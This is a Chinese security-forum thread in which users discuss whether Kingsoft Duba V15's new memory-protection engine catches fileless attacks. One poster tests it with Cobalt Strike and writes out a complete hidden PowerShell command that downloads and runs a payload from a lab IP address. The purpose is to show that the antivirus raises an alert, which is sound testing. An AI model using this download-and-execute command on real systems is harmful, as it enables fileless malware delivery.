楼主: 鸦口无盐
收起左侧

[金山] 毒霸V15本周版本新增内存防护引擎,可防御无文件攻击

[复制链接]
pal家族
发表于 2022-8-16 14:44:27 | 显示全部楼层
本帖最后由 pal家族 于 2022-8-16 14:47 编辑

你很难想象 一个只有执行监控而且还缺引擎得手动扫描才能行的杀软
能够实时监控内存 可以拦截无文件攻击

这让我想到了0几年我的电脑上装了瑞星杀毒和瑞星防火墙
又一次我发现任务管理器里有奇怪的程序在运行 一看就是病毒,但是瑞星杀毒软件全程没有任何反应
但是当我使用瑞星防火墙附带的一个内存扫描功能时,竟然报毒了。病毒被防火墙删掉了。。。。。。
qwe12301
发表于 2022-8-16 15:16:07 | 显示全部楼层
pal家族 发表于 2022-8-16 14:44
你很难想象 一个只有执行监控而且还缺引擎得手动扫描才能行的杀软
能够实时监控内存 可以拦截无文件攻击
...

应该会解决的,也不是什么技术难题。
dsb2466
头像被屏蔽
发表于 2022-8-16 15:24:34 | 显示全部楼层
本帖最后由 dsb2466 于 2022-8-16 15:30 编辑
pal家族 发表于 2022-8-16 14:44
你很难想象 一个只有执行监控而且还缺引擎得手动扫描才能行的杀软
能够实时监控内存 可以拦截无文件攻击
...

你把毒霸退了,手动加载CS木马后,再打开毒霸,然后再依次执行CS的功能模块试试,看看报毒不,不就知道了?下面是我单独测试一个模块后的效果:


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
隔山打空气
发表于 2022-8-16 15:26:45 | 显示全部楼层
dsb2466 发表于 2022-8-16 15:24
你把毒霸退了,手动加载CS木马后,再依次执行功能模块试试,不就知道了?

估计不太行了吧,CS有些shellcode需要加载中扫描干掉,隐藏成功之后内存扫描的机会就会减少

可以尝试关闭一部分安防模块
dsb2466
头像被屏蔽
发表于 2022-8-16 15:28:42 | 显示全部楼层
隔山打空气 发表于 2022-8-16 15:26
估计不太行了吧,CS有些shellcode需要加载中扫描干掉,隐藏成功之后内存扫描的机会就会减少

可以尝试 ...

你看我上面的截图
隔山打空气
发表于 2022-8-16 15:29:58 | 显示全部楼层
dsb2466 发表于 2022-8-16 15:28
你看我上面的截图

好家伙,毒霸这是要起飞了?

太惊悚了(bushi
dsb2466
头像被屏蔽
发表于 2022-8-16 15:44:41 | 显示全部楼层
pal家族 发表于 2022-8-16 14:44
你很难想象 一个只有执行监控而且还缺引擎得手动扫描才能行的杀软
能够实时监控内存 可以拦截无文件攻击
...

再来试试无文件执行:


1、CS加载
【powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.40.130:80/a'))"】



2、点击允许


3、继续点击允许


4、内存告警


测试结束

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
dsb2466
头像被屏蔽
发表于 2022-8-16 15:47:46 | 显示全部楼层
隔山打空气 发表于 2022-8-16 15:29
好家伙,毒霸这是要起飞了?

太惊悚了(bushi

必须起飞呀
pal家族
发表于 2022-8-16 16:56:47 | 显示全部楼层

辛苦了
从来都不承认是官人的官人
dsb2466
头像被屏蔽
发表于 2022-8-16 16:58:01 | 显示全部楼层
pal家族 发表于 2022-8-16 16:56
辛苦了
从来都不承认是官人的官人

我真的不是DB官人,我现在是粉丝
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 02:36 , Processed in 0.100280 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表